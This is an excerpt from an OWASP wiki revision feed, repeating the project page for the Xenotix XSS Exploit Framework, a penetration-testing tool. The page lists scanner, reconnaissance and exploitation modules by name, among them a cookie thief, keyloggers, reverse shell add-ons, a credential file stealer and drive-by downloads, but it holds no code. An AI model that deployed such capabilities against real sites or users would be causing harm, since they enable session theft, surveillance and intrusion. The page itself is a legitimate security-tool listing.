&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=185772</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=185772"/>
				<updated>2014-11-22T15:50:32Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: aligning&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing Download V6 From GDrive]&lt;br /&gt;
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Introduction to OWASP Xenotix XSS Exploit Framework'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|C15po4TK4Os}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS in GET Request'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|fPC_stgovcU}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with GET Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|K5nbgvXvY1g}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|AqdEG-vsywQ}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J_qdm_-XVV0}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with Advanced Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|AqdEG-vsywQ}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=185769</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=185769"/>
				<updated>2014-11-22T15:40:02Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: /* Documentation Added V6 Video Tutorial Series */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
